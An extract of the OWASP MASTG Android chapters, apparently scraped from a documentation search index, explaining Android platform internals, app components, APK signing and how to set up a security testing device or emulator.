The relationship between group IDs and permissions is defined in the following file:
frameworks/base/data/etc/platform.xml
<permission name=\"android.permission.INTERNET\" >\n <group gid=\"inet\" />\n</permission>\n\n<permission name=\"android.permission.READ_LOGS\" >\n <group gid=\"log\" />\n</permission>\n\n<permission name=\"android.permission.WRITE_MEDIA_STORAGE\" >\n <group gid=\"media_rw\" />\n <group gid=\"sdcard_rw\" />\n</permission>\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#zygote","title":"Zygote","text":"The process Zygote
starts up during Android initialization. Zygote is a system service for launching apps. The Zygote process is a \"base\" process that contains all the core libraries the app needs. Upon launch, Zygote opens the socket /dev/socket/zygote
and listens for connections from local clients. When it receives a connection, it forks a new process, which then loads and executes the app-specific code.
In Android, the lifetime of an app process is controlled by the operating system. A new Linux process is created when an app component is started and the same app doesn\u2019t yet have any other components running. Android may kill this process when the latter is no longer necessary or when reclaiming memory is necessary to run more important apps. The decision to kill a process is primarily related to the state of the user's interaction with the process. In general, processes can be in one of four states.
A visible process is a process that the user is aware of, so killing it would have a noticeable negative impact on user experience. One example is running an activity that's visible to the user on-screen but not in the foreground.
A service process is a process hosting a service that has been started with the startService
method. Though these processes aren't directly visible to the user, they are generally things that the user cares about (such as background network data upload or download), so the system will always keep such processes running unless there's insufficient memory to retain all foreground and visible processes.
onCreate
handler is called when the app process is first created. Other callback methods include onLowMemory
, onTrimMemory
and onConfigurationChanged
.Android applications can be shipped in two forms: the Android Package Kit (APK) file or an Android App Bundle (.aab). Android App Bundles provide all the resources necessary for an app, but defer the generation of the APK and its signing to Google Play. App Bundles are signed binaries which contain the code of the app in several modules. The base module contains the core of the application. The base module can be extended with various modules which contain new enrichments/functionalities for the app as further explained on the developer documentation for app bundle. If you have an Android App Bundle, you can best use the bundletool command line tool from Google to build unsigned APKs in order to use the existing tooling on the APK. You can create an APK from an AAB file by running the following command:
bundletool build-apks --bundle=/MyApp/my_app.aab --output=/MyApp/my_app.apks\n
If you want to create signed APKs ready for deployment to a test device, use:
$ bundletool build-apks --bundle=/MyApp/my_app.aab --output=/MyApp/my_app.apks\n--ks=/MyApp/keystore.jks\n--ks-pass=file:/MyApp/keystore.pwd\n--ks-key-alias=MyKeyAlias\n--key-pass=file:/MyApp/key.pwd\n
We recommend that you test both the APK with and without the additional modules, so that it becomes clear whether the additional modules introduce and/or fix security issues for the base module.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-manifest","title":"Android Manifest","text":"Every app has an Android Manifest file, which embeds content in binary XML format. The standard name of this file is AndroidManifest.xml. It is located in the root directory of the app\u2019s Android Package Kit (APK) file.
The manifest file describes the app structure, its components (activities, services, content providers, and intent receivers), and requested permissions. It also contains general app metadata, such as the app's icon, version number, and theme. The file may list other information, such as compatible APIs (minimal, targeted, and maximal SDK version) and the kind of storage it can be installed on (external or internal).
Here is an example of a manifest file, including the package name (the convention is a reversed URL, but any string is acceptable). It also lists the app version, relevant SDKs, required permissions, exposed content providers, broadcast receivers used with intent filters and a description of the app and its activities:
<manifest\n package=\"com.owasp.myapplication\"\n android:versionCode=\"0.1\" >\n\n <uses-sdk android:minSdkVersion=\"12\"\n android:targetSdkVersion=\"22\"\n android:maxSdkVersion=\"25\" />\n\n <uses-permission android:name=\"android.permission.INTERNET\" />\n\n <provider\n android:name=\"com.owasp.myapplication.MyProvider\"\n android:exported=\"false\" />\n\n <receiver android:name=\".MyReceiver\" >\n <intent-filter>\n <action android:name=\"com.owasp.myapplication.myaction\" />\n </intent-filter>\n </receiver>\n\n <application\n android:icon=\"@drawable/ic_launcher\"\n android:label=\"@string/app_name\"\n android:theme=\"@style/Theme.Material.Light\" >\n <activity\n android:name=\"com.owasp.myapplication.MainActivity\" >\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n </intent-filter>\n </activity>\n </application>\n</manifest>\n
The full list of available manifest options is in the official Android Manifest file documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#app-components","title":"App Components","text":"Android apps are made of several high-level components. The main components are:
All these elements are provided by the Android operating system, in the form of predefined classes available through APIs.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#activities","title":"Activities","text":"Activities make up the visible part of any app. There is one activity per screen, so an app with three different screens implements three different activities. Activities are declared by extending the Activity class. They contain all user interface elements: fragments, views, and layouts.
Each activity needs to be declared in the Android Manifest with the following syntax:
<activity android:name=\"ActivityName\">\n</activity>\n
Activities not declared in the manifest can't be displayed, and attempting to launch them will raise an exception.
Like apps, activities have their own life cycle and need to monitor system changes to handle them. Activities can be in the following states: active, paused, stopped, and inactive. These states are managed by the Android operating system. Accordingly, activities can implement the following event managers:
An app may not explicitly implement all event managers, in which case default actions are taken. Typically, at least the onCreate
manager is overridden by the app developers. This is how most user interface components are declared and initialized. onDestroy
may be overridden when resources (like network connections or connections to databases) must be explicitly released or specific actions must occur when the app shuts down.
A fragment represents a behavior or a portion of the user interface within the activity. Fragments were introduced Android with the version Honeycomb 3.0 (API level 11).
Fragments are meant to encapsulate parts of the interface to facilitate re-usability and adaptation to different screen sizes. Fragments are autonomous entities in that they include all their required components (they have their own layout, buttons, etc.). However, they must be integrated with activities to be useful: fragments can't exist on their own. They have their own life cycle, which is tied to the life cycle of the Activities that implement them.
Because fragments have their own life cycle, the Fragment class contains event managers that can be redefined and extended. These event managers included onAttach, onCreate, onStart, onDestroy and onDetach. Several others exist; the reader should refer to the Android Fragment specification for more details.
Fragments can be easily implemented by extending the Fragment class provided by Android:
Example in Java:
public class MyFragment extends Fragment {\n ...\n}\n
Example in Kotlin:
class MyFragment : Fragment() {\n ...\n}\n
Fragments don't need to be declared in manifest files because they depend on activities.
To manage its fragments, an activity can use a Fragment Manager (FragmentManager class). This class makes it easy to find, add, remove, and replace associated fragments.
Fragment Managers can be created via the following:
Example in Java:
FragmentManager fm = getFragmentManager();\n
Example in Kotlin:
var fm = fragmentManager\n
Fragments don't necessarily have a user interface; they can be a convenient and efficient way to manage background operations pertaining to the app's user interface. A fragment may be declared persistent so that if the system preserves its state even if its Activity is destroyed.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#content-providers","title":"Content Providers","text":"Android uses SQLite to store data permanently: as with Linux, data is stored in files. SQLite is a light, efficient, open source relational data storage technology that does not require much processing power, which makes it ideal for mobile use. An entire API with specific classes (Cursor, ContentValues, SQLiteOpenHelper, ContentProvider, ContentResolver, etc.) is available. SQLite is not run as a separate process; it is part of the app. By default, a database belonging to a given app is accessible to this app only. However, content providers offer a great mechanism for abstracting data sources (including databases and flat files); they also provide a standard and efficient mechanism to share data between apps, including native apps. To be accessible to other apps, a content provider needs to be explicitly declared in the manifest file of the app that will share it. As long as content providers aren't declared, they won't be exported and can only be called by the app that creates them.
Content providers are implemented through a URI addressing scheme: they all use the content:// model. Regardless of the type of sources (SQLite database, flat file, etc.), the addressing scheme is always the same, thereby abstracting the sources and offering the developer a unique scheme. Content providers offer all regular database operations: create, read, update, delete. That means that any app with proper rights in its manifest file can manipulate the data from other apps.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#services","title":"Services","text":"Services are Android OS components (based on the Service class) that perform tasks in the background (data processing, starting intents, and notifications, etc.) without presenting a user interface. Services are meant to run processes long-term. Their system priorities are lower than those of active apps and higher than those of inactive apps. Therefore, they are less likely to be killed when the system needs resources, and they can be configured to automatically restart when enough resources become available. This makes services a great candidate for running background tasks. Please note that Services, like Activities, are executed in the main app thread. A service does not create its own thread and does not run in a separate process unless you specify otherwise.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#inter-process-communication","title":"Inter-Process Communication","text":"As we've already learned, every Android process has its own sandboxed address space. Inter-process communication facilities allow apps to exchange signals and data securely. Instead of relying on the default Linux IPC facilities, Android's IPC is based on Binder, a custom implementation of OpenBinder. Most Android system services and all high-level IPC services depend on Binder.
The term Binder stands for a lot of different things, including:
The Binder framework includes a client-server communication model. To use IPC, apps call IPC methods in proxy objects. The proxy objects transparently marshall the call parameters into a parcel and send a transaction to the Binder server, which is implemented as a character driver (/dev/binder). The server holds a thread pool for handling incoming requests and delivers messages to the destination object. From the perspective of the client app, all of this seems like a regular method call, all the heavy lifting is done by the Binder framework.
Services that allow other applications to bind to them are called bound services. These services must provide an IBinder interface to clients. Developers use the Android Interface Descriptor Language (AIDL) to write interfaces for remote services.
ServiceManager is a system daemon that manages the registration and lookup of system services. It maintains a list of name/Binder pairs for all registered services. Services are added with addService
and retrieved by name with the static getService
method in android.os.ServiceManager
:
Example in Java:
public static IBinder getService(String name) {\n try {\n IBinder service = sCache.get(name);\n if (service != null) {\n return service;\n } else {\n return getIServiceManager().getService(name);\n }\n } catch (RemoteException e) {\n Log.e(TAG, \"error in getService\", e);\n }\n return null;\n }\n
Example in Kotlin:
companion object {\n private val sCache: Map<String, IBinder> = ArrayMap()\n fun getService(name: String): IBinder? {\n try {\n val service = sCache[name]\n return service ?: getIServiceManager().getService(name)\n } catch (e: RemoteException) {\n Log.e(FragmentActivity.TAG, \"error in getService\", e)\n }\n return null\n }\n }\n
You can query the list of system services with the service list
command.
$ adb shell service list\nFound 99 services:\n0 carrier_config: [com.android.internal.telephony.ICarrierConfigLoader]\n1 phone: [com.android.internal.telephony.ITelephony]\n2 isms: [com.android.internal.telephony.ISms]\n3 iphonesubinfo: [com.android.internal.telephony.IPhoneSubInfo]\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#intents","title":"Intents","text":"Intent messaging is an asynchronous communication framework built on top of Binder. This framework allows both point-to-point and publish-subscribe messaging. An Intent is a messaging object that can be used to request an action from another app component. Although intents facilitate inter-component communication in several ways, there are three fundamental use cases:
startActivity
. The intent describes the activity and carries necessary data.sendBroadcast
or sendOrderedBroadcast
.There are two types of intents. Explicit intents name the component that will be started (the fully qualified class name). For instance:
Example in Java:
Intent intent = new Intent(this, myActivity.myClass);\n
Example in Kotlin:
var intent = Intent(this, myActivity.myClass)\n
Implicit intents are sent to the OS to perform a given action on a given set of data (The URL of the OWASP website in our example below). It is up to the system to decide which app or class will perform the corresponding service. For instance:
Example in Java:
Intent intent = new Intent(Intent.MY_ACTION, Uri.parse(\"https://www.owasp.org\"));\n
Example in Kotlin:
var intent = Intent(Intent.MY_ACTION, Uri.parse(\"https://www.owasp.org\"))\n
An intent filter is an expression in Android Manifest files that specifies the type of intents the component would like to receive. For instance, by declaring an intent filter for an activity, you make it possible for other apps to directly start your activity with a certain kind of intent. Likewise, your activity can only be started with an explicit intent if you don't declare any intent filters for it.
Android uses intents to broadcast messages to apps (such as an incoming call or SMS) important power supply information (low battery, for example), and network changes (loss of connection, for instance). Extra data may be added to intents (through putExtra
/getExtras
).
Here is a short list of intents sent by the operating system. All constants are defined in the Intent class, and the whole list is in the official Android documentation:
To improve security and privacy, a Local Broadcast Manager is used to send and receive intents within an app without having them sent to the rest of the operating system. This is very useful for ensuring that sensitive and private data don't leave the app perimeter (geolocation data for instance).
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#broadcast-receivers","title":"Broadcast Receivers","text":"Broadcast Receivers are components that allow apps to receive notifications from other apps and from the system itself. With them, apps can react to events (internal, initiated by other apps, or initiated by the operating system). They are generally used to update user interfaces, start services, update content, and create user notifications.
There are two ways to make a Broadcast Receiver known to the system. One way is to declare it in the Android Manifest file. The manifest should specify an association between the Broadcast Receiver and an intent filter to indicate the actions the receiver is meant to listen for.
An example Broadcast Receiver declaration with an intent filter in a manifest:
<receiver android:name=\".MyReceiver\" >\n <intent-filter>\n <action android:name=\"com.owasp.myapplication.MY_ACTION\" />\n </intent-filter>\n</receiver>\n
Please note that in this example, the Broadcast Receiver does not include the android:exported
attribute. As at least one filter was defined, the default value will be set to \"true\". In absence of any filters, it will be set to \"false\".
The other way is to create the receiver dynamically in code. The receiver can then register with the method Context.registerReceiver
.
An example of registering a Broadcast Receiver dynamically:
Example in Java:
// Define a broadcast receiver\nBroadcastReceiver myReceiver = new BroadcastReceiver() {\n @Override\n public void onReceive(Context context, Intent intent) {\n Log.d(TAG, \"Intent received by myReceiver\");\n }\n};\n// Define an intent filter with actions that the broadcast receiver listens for\nIntentFilter intentFilter = new IntentFilter();\nintentFilter.addAction(\"com.owasp.myapplication.MY_ACTION\");\n// To register the broadcast receiver\nregisterReceiver(myReceiver, intentFilter);\n// To un-register the broadcast receiver\nunregisterReceiver(myReceiver);\n
Example in Kotlin:
// Define a broadcast receiver\nval myReceiver: BroadcastReceiver = object : BroadcastReceiver() {\n override fun onReceive(context: Context, intent: Intent) {\n Log.d(FragmentActivity.TAG, \"Intent received by myReceiver\")\n }\n}\n// Define an intent filter with actions that the broadcast receiver listens for\nval intentFilter = IntentFilter()\nintentFilter.addAction(\"com.owasp.myapplication.MY_ACTION\")\n// To register the broadcast receiver\nregisterReceiver(myReceiver, intentFilter)\n// To un-register the broadcast receiver\nunregisterReceiver(myReceiver)\n
Note that the system starts an app with the registered receiver automatically when a relevant intent is raised.
According to Broadcasts Overview, a broadcast is considered \"implicit\" if it does not target an app specifically. After receiving an implicit broadcast, Android will list all apps that have registered a given action in their filters. If more than one app has registered for the same action, Android will prompt the user to select from the list of available apps.
An interesting feature of Broadcast Receivers is that they can be prioritized; this way, an intent will be delivered to all authorized receivers according to their priority. A priority can be assigned to an intent filter in the manifest via the android:priority
attribute as well as programmatically via the IntentFilter.setPriority
method. However, note that receivers with the same priority will be run in an arbitrary order.
If your app is not supposed to send broadcasts across apps, use a Local Broadcast Manager (LocalBroadcastManager
). They can be used to make sure intents are received from the internal app only, and any intent from any other app will be discarded. This is very useful for improving security and the efficiency of the app, as no interprocess communication is involved. However, please note that the LocalBroadcastManager
class is deprecated and Google recommends using alternatives such as LiveData
.
For more security considerations regarding Broadcast Receiver, see Security Considerations and Best Practices.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#implicit-broadcast-receiver-limitation","title":"Implicit Broadcast Receiver Limitation","text":"According to Background Optimizations, apps targeting Android 7.0 (API level 24) or higher no longer receive CONNECTIVITY_ACTION
broadcast unless they register their Broadcast Receivers with Context.registerReceiver()
. The system does not send ACTION_NEW_PICTURE
and ACTION_NEW_VIDEO
broadcasts as well.
According to Background Execution Limits, apps that target Android 8.0 (API level 26) or higher can no longer register Broadcast Receivers for implicit broadcasts in their manifest, except for those listed in Implicit Broadcast Exceptions. The Broadcast Receivers created at runtime by calling Context.registerReceiver
are not affected by this limitation.
According to Changes to System Broadcasts, beginning with Android 9 (API level 28), the NETWORK_STATE_CHANGED_ACTION
broadcast doesn't receive information about the user's location or personally identifiable data.
Once an app has been successfully developed, the next step is to publish and share it with others. However, apps can't simply be added to a store and shared, they must be first signed. The cryptographic signature serves as a verifiable mark placed by the developer of the app. It identifies the app\u2019s author and ensures that the app has not been modified since its initial distribution.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#signing-process","title":"Signing Process","text":"During development, apps are signed with an automatically generated certificate. This certificate is inherently insecure and is for debugging only. Most stores don't accept this kind of certificate for publishing; therefore, a certificate with more secure features must be created. When an application is installed on the Android device, the Package Manager ensures that it has been signed with the certificate included in the corresponding APK. If the certificate's public key matches the key used to sign any other APK on the device, the new APK may share a UID with the pre-existing APK. This facilitates interactions between applications from a single vendor. Alternatively, specifying security permissions for the Signature protection level is possible; this will restrict access to applications that have been signed with the same key.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signing-schemes","title":"APK Signing Schemes","text":"Android supports three application signing schemes. Starting with Android 9 (API level 28), APKs can be verified with APK Signature Scheme v3 (v3 scheme), APK Signature Scheme v2 (v2 scheme) or JAR signing (v1 scheme). For Android 7.0 (API level 24) and above, APKs can be verified with the APK Signature Scheme v2 (v2 scheme) or JAR signing (v1 scheme). For backwards compatibility, an APK can be signed with multiple signature schemes in order to make the app run on both newer and older SDK versions. Older platforms ignore v2 signatures and verify v1 signatures only.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#jar-signing-v1-scheme","title":"JAR Signing (v1 Scheme)","text":"The original version of app signing implements the signed APK as a standard signed JAR, which must contain all the entries in META-INF/MANIFEST.MF
. All files must be signed with a common certificate. This scheme does not protect some parts of the APK, such as ZIP metadata. The drawback of this scheme is that the APK verifier needs to process untrusted data structures before applying the signature, and the verifier discards data the data structures don't cover. Also, the APK verifier must decompress all compressed files, which takes considerable time and memory.
With the APK signature scheme, the complete APK is hashed and signed, and an APK Signing Block is created and inserted into the APK. During validation, the v2 scheme checks the signatures of the entire APK file. This form of APK verification is faster and offers more comprehensive protection against modification. You can see the APK signature verification process for v2 Scheme below.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signature-scheme-v3-scheme","title":"APK Signature Scheme (v3 Scheme)","text":"The v3 APK Signing Block format is the same as v2. V3 adds information about the supported SDK versions and a proof-of-rotation struct to the APK signing block. In Android 9 (API level 28) and higher, APKs can be verified according to APK Signature Scheme v3, v2 or v1 scheme. Older platforms ignore v3 signatures and try to verify v2 then v1 signature.
The proof-of-rotation attribute in the signed-data of the signing block consists of a singly-linked list, with each node containing a signing certificate used to sign previous versions of the app. To make backward compatibility work, the old signing certificates sign the new set of certificates, thus providing each new key with evidence that it should be as trusted as the older key(s). It is no longer possible to sign APKs independently, because the proof-of-rotation structure must have the old signing certificates signing the new set of certificates, rather than signing them one-by-one. You can see the APK signature v3 scheme verification process below.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signature-scheme-v4-scheme","title":"APK Signature Scheme (v4 Scheme)","text":"The APK Signature Scheme v4 was introduced along with Android 11 (API level 30) and requires all devices launched with Android 11 and up to have fs-verity enabled by default. fs-verity is a Linux kernel feature that is primarily used for file authentication (detection of malicious modifications) due to its extremely efficient file hash calculation. Read requests only will succeed if the content verifies against trusted digital certificates that were loaded to the kernel keyring during boot time.
The v4 signature requires a complementary v2 or v3 signature and in contrast to previous signature schemes, the v4 signature is stored in a separate file <apk name>.apk.idsig
. Remember to specify it using the --v4-signature-file
flag when verifying a v4-signed APK with apksigner verify
.
You can find more detailed information in the Android developer documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#creating-your-certificate","title":"Creating Your Certificate","text":"Android uses public/private certificates to sign Android apps (.apk files). Certificates are bundles of information; in terms of security, keys are the most important part of that bundle. Public certificates contain users' public keys, and private certificates contain users' private keys. Public and private certificates are linked. Certificates are unique and can't be re-generated. Note that if a certificate is lost, it cannot be recovered, so updating any apps signed with that certificate becomes impossible. App creators can either reuse an existing private/public key pair that is in an available KeyStore or generate a new pair. In the Android SDK, a new key pair is generated with the keytool
command. The following command creates a RSA key pair with a key length of 2048 bits and an expiry time of 7300 days = 20 years. The generated key pair is stored in the file 'myKeyStore.jks', which is in the current directory:
keytool -genkey -alias myDomain -keyalg RSA -keysize 2048 -validity 7300 -keystore myKeyStore.jks -storepass myStrongPassword\n
Safely storing your secret key and making sure it remains secret during its entire life cycle is of paramount importance. Anyone who gains access to the key will be able to publish updates to your apps with content that you don't control (thereby adding insecure features or accessing shared content with signature-based permissions). The trust that a user places in an app and its developers is based totally on such certificates; certificate protection and secure management are therefore vital for reputation and customer retention, and secret keys must never be shared with other individuals. Keys are stored in a binary file that can be protected with a password; such files are referred to as KeyStores. KeyStore passwords should be strong and known only to the key creator. For this reason, keys are usually stored on a dedicated build machine that developers have limited access to. An Android certificate must have a validity period that's longer than that of the associated app (including updated versions of the app). For example, Google Play will require certificates to remain valid until Oct 22nd, 2033 at least.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#signing-an-application","title":"Signing an Application","text":"The goal of the signing process is to associate the app file (.apk) with the developer's public key. To achieve this, the developer calculates a hash of the APK file and encrypts it with their own private key. Third parties can then verify the app's authenticity (e.g., the fact that the app really comes from the user who claims to be the originator) by decrypting the encrypted hash with the author\u2019s public key and verifying that it matches the actual hash of the APK file.
Many Integrated Development Environments (IDE) integrate the app signing process to make it easier for the user. Be aware that some IDEs store private keys in clear text in configuration files; double-check this in case others are able to access such files and remove the information if necessary. Apps can be signed from the command line with the 'apksigner' tool provided by the Android SDK (API level 24 and higher). It is located at [SDK-Path]/build-tools/[version]
. For API 24.0.2 and below, you can use 'jarsigner', which is part of the Java JDK. Details about the whole process can be found in official Android documentation; however, an example is given below to illustrate the point.
apksigner sign --out mySignedApp.apk --ks myKeyStore.jks myUnsignedApp.apk\n
In this example, an unsigned app ('myUnsignedApp.apk') will be signed with a private key from the developer KeyStore 'myKeyStore.jks' (located in the current directory). The app will become a signed app called 'mySignedApp.apk' and will be ready to release to stores.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#zipalign","title":"Zipalign","text":"The zipalign
tool should always be used to align the APK file before distribution. This tool aligns all uncompressed data (such as images, raw files, and 4-byte boundaries) within the APK, which helps improve memory management during app runtime.
Zipalign must be used before the APK file is signed with apksigner.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#publishing-process","title":"Publishing Process","text":"Distributing apps from anywhere (your own site, any store, etc.) is possible because the Android ecosystem is open. However, Google Play is the most well-known, trusted, and popular store, and Google itself provides it. Amazon Appstore is the trusted default store for Kindle devices. If users want to install third-party apps from a non-trusted source, they must explicitly allow this with their device security settings.
Apps can be installed on an Android device from a variety of sources: locally via USB, via Google's official app store (Google Play Store) or from alternative stores.
Whereas other vendors may review and approve apps before they are actually published, Google will simply scan for known malware signatures; this minimizes the time between the beginning of the publishing process and public app availability.
Publishing an app is quite straightforward; the main operation is making the signed APK file downloadable. On Google Play, publishing starts with account creation and is followed by app delivery through a dedicated interface. Details are available at the official Android documentation.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/","title":"Android Security Testing","text":"In this chapter, we'll dive into setting up a security testing environment and introduce you to some practical processes and techniques for testing the security of Android apps. These are the building blocks for the MASTG test cases.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#android-testing-setup","title":"Android Testing Setup","text":"You can set up a fully functioning test environment on almost any machine running Windows, Linux, or macOS.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#host-device","title":"Host Device","text":"At the very least, you'll need Android Studio (which comes with the Android SDK) platform tools, an emulator, and an app to manage the various SDK versions and framework components. Android Studio also comes with an Android Virtual Device (AVD) Manager application for creating emulator images. Make sure that the newest SDK tools and platform tools packages are installed on your system.
In addition, you may want to complete your host setup by installing the Android NDK if you're planning to work with apps containing native libraries.
Sometimes it can be useful to display or control devices from the computer. To achieve this, you can use Scrcpy.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-device","title":"Testing Device","text":"For dynamic analysis, you'll need an Android device to run the target app on. In principle, you can test without a real Android device and use only the emulator. However, apps execute quite slowly on a emulator, and simulators may not give realistic results. Testing on a real device makes for a smoother process and a more realistic environment. On the other hand, emulators allow you to easily change SDK versions or create multiple devices. A full overview of the pros and cons of each approach is listed in the table below.
Property Physical Emulator/Simulator Ability to restore Softbricks are always possible, but new firmware can typically still be flashed. Hardbricks are very rare. Emulators can crash or become corrupt, but a new one can be created or a snapshot can be restored. Reset Can be restored to factory settings or reflashed. Emulators can be deleted and recreated. Snapshots Not possible. Supported, great for malware analysis. Speed Much faster than emulators. Typically slow, but improvements are being made. Cost Typically start at $200 for a usable device. You may require different devices, such as one with or without a biometric sensor. Both free and commercial solutions exist. Ease of rooting Highly dependent on the device. Typically rooted by default. Ease of emulator detection It's not an emulator, so emulator checks are not applicable. Many artefacts will exist, making it easy to detect that the app is running in an emulator. Ease of root detection Easier to hide root, as many root detection algorithms check for emulator properties. With Magisk Systemless root it's nearly impossible to detect. Emulators will almost always trigger root detection algorithms due to the fact that they are built for testing with many artefacts that can be found. Hardware interaction Easy interaction through Bluetooth, NFC, 4G, Wi-Fi, biometrics, camera, GPS, gyroscope, ... Usually fairly limited, with emulated hardware input (e.g. random GPS coordinates) API level support Depends on the device and the community. Active communities will keep distributing updated versions (e.g. LineageOS), while less popular devices may only receive a few updates. Switching between versions requires flashing the device, a tedious process. Always supports the latest versions, including beta releases. Emulators containing specific API levels can easily be downloaded and launched. Native library support Native libraries are usually built for ARM devices, so they will work on a physical device. Some emulators run on x86 CPUs, so they may not be able to run packaged native libraries. Malware danger Malware samples can infect a device, but if you can clear out the device storage and flash a clean firmware, thereby restoring it to factory settings, this should not be a problem. Be aware that there are malware samples that try to exploit the USB bridge. Malware samples can infect an emulator, but the emulator can simply be removed and recreated. It is also possible to create snapshots and compare different snapshots to help in malware analysis. Be aware that there are malware proofs of concept which try to attack the hypervisor."},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-on-a-real-device","title":"Testing on a Real Device","text":"Almost any physical device can be used for testing, but there are a few considerations to be made. First, the device needs to be rootable. This is typically either done through an exploit, or through an unlocked bootloader. Exploits are not always available, and the bootloader may be locked permanently, or it may only be unlocked once the carrier contract has been terminated.
The best candidates are flagship Google pixel devices built for developers. These devices typically come with an unlockable bootloader, opensource firmware, kernel, radio available online and official OS source code. The developer communities prefer Google devices as the OS is closest to the android open source project. These devices generally have the longest support windows with 2 years of OS updates and 1 year of security updates after that.
Alternatively, Google's Android One project contains devices that will receive the same support windows (2 years of OS updates, 1 year of security updates) and have near-stock experiences. While it was originally started as a project for low-end devices, the program has evolved to include mid-range and high-end smartphones, many of which are actively supported by the modding community.
Devices that are supported by the LineageOS project are also very good candidates for test devices. They have an active community, easy to follow flashing and rooting instructions and the latest Android versions are typically quickly available as a Lineage installation. LineageOS also continues support for new Android versions long after the OEM has stopped distributing updates.
When working with an Android physical device, you'll want to enable Developer Mode and USB debugging on the device in order to use the ADB debugging interface. Since Android 4.2 (API level 16), the Developer options sub menu in the Settings app is hidden by default. To activate it, tap the Build number section of the About phone view seven times. Note that the build number field's location varies slightly by device. For example, on LG Phones, it is under About phone -> Software information. Once you have done this, Developer options will be shown at bottom of the Settings menu. Once developer options are activated, you can enable debugging with the USB debugging switch.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-on-an-emulator","title":"Testing on an Emulator","text":"Multiple emulators exist, once again with their own strengths and weaknesses:
Free emulators:
Commercial emulators:
Although there exist several free Android emulators, we recommend using AVD as it provides enhanced features appropriate for testing your app compared to the others. In the remainder of this guide, we will use the official AVD to perform tests.
AVD supports some hardware emulation, such as GPS or SMS through its so-called Extended Controls as well as motion sensors.
You can either start an Android Virtual Device (AVD) by using the AVD Manager in Android Studio or start the AVD manager from the command line with the android
command, which is found in the tools directory of the Android SDK:
./android avd\n
Several tools and VMs that can be used to test an app within an emulator environment are available:
Please also verify the \"Testing Tools\" chapter at the end of this book.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#getting-privileged-access","title":"Getting Privileged Access","text":"Rooting (i.e., modifying the OS so that you can run commands as the root user) is recommended for testing on a real device. This gives you full control over the operating system and allows you to bypass restrictions such as app sandboxing. These privileges in turn allow you to use techniques like code injection and function hooking more easily.
Note that rooting is risky, and three main consequences need to be clarified before you proceed. Rooting can have the following negative effects:
You should not root a personal device that you store your private information on. We recommend getting a cheap, dedicated test device instead. Many older devices, such as Google's Nexus series, can run the newest Android versions and are perfectly fine for testing.
You need to understand that rooting your device is ultimately YOUR decision and that OWASP shall in no way be held responsible for any damage. If you're uncertain, seek expert advice before starting the rooting process.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#which-mobiles-can-be-rooted","title":"Which Mobiles Can Be Rooted","text":"Virtually any Android mobile can be rooted. Commercial versions of Android OS (which are Linux OS evolutions at the kernel level) are optimized for the mobile world. Some features have been removed or disabled for these versions, for example, non-privileged users' ability to become the 'root' user (who has elevated privileges). Rooting a phone means allowing users to become the root user, e.g., adding a standard Linux executable called su
, which is used to change to another user account.
To root a mobile device, first unlock its boot loader. The unlocking procedure depends on the device manufacturer. However, for practical reasons, rooting some mobile devices is more popular than rooting others, particularly when it comes to security testing: devices created by Google and manufactured by companies like Samsung, LG, and Motorola are among the most popular, particularly because they are used by many developers. The device warranty is not nullified when the boot loader is unlocked and Google provides many tools to support the root itself.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#rooting-with-magisk","title":"Rooting with Magisk","text":"Magisk (\"Magic Mask\") is one way to root your Android device. Its specialty lies in the way the modifications on the system are performed. While other rooting tools alter the actual data on the system partition, Magisk does not (which is called \"systemless\"). This enables a way to hide the modifications from root-sensitive applications (e.g. for banking or games) and allows using the official Android OTA upgrades without the need to unroot the device beforehand.
You can get familiar with Magisk reading the official documentation on GitHub. If you don't have Magisk installed, you can find installation instructions in the documentation. If you use an official Android version and plan to upgrade it, Magisk provides a tutorial on GitHub.
Furthermore, developers can use the power of Magisk to create custom modules and submit them to the official Magisk Modules repository. Submitted modules can then be installed inside the Magisk Manager application. One of these installable modules is a systemless version of the famous Xposed Framework (available for SDK versions up to 27).
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#root-detection","title":"Root Detection","text":"An extensive list of root detection methods is presented in the \"Testing Anti-Reversing Defenses on Android\" chapter.
For a typical mobile app security build, you'll usually want to test a debug build with root detection disabled. If such a build is not available for testing, you can disable root detection in a variety of ways that will be introduced later in this book.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/","title":"Android Data Storage","text":""},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#overview","title":"Overview","text":"This chapter discusses the importance of securing sensitive data, like authentication tokens and private information, vital for mobile security. We'll look at Android's APIs for local data storage and share best practices.
While it's preferable to limit sensitive data on local storage, or avoid it at all whenever possible, practical use cases often necessitate user data storage. For example, to improve user experience, apps cache authentication tokens locally, circumventing the need for complex password entry at each app start. Apps may also need to store personally identifiable information (PII) and other sensitive data.
Sensitive data can become vulnerable if improperly protected, potentially stored in various locations, including the device or an external SD card. It's important to identify the information processed by the mobile app and classify what counts as sensitive data. Check out the \"Identifying Sensitive Data\" section in the \"Mobile App Security Testing\" chapter for data classification details. Refer to Security Tips for Storing Data in the Android developer's guide for comprehensive insights.
